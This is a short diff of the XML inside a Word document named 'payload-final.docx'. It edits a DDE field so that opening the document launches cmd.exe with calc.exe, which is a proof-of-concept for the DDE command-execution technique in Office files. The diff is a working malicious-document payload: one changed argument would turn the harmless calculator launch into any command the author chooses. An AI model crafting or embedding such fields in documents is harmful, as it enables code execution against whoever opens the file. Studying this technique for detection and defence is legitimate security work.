--- a/payload-final.docx
+++ b/payload-final.docx
@@ -9,7 +9,7 @@
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
       <w:r>
-        <w:instrText xml:space="preserve">DDE "calc.exe" "" ""</w:instrText>
+        <w:instrText xml:space="preserve">DDE "cmd.exe" "calc.exe" ""</w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
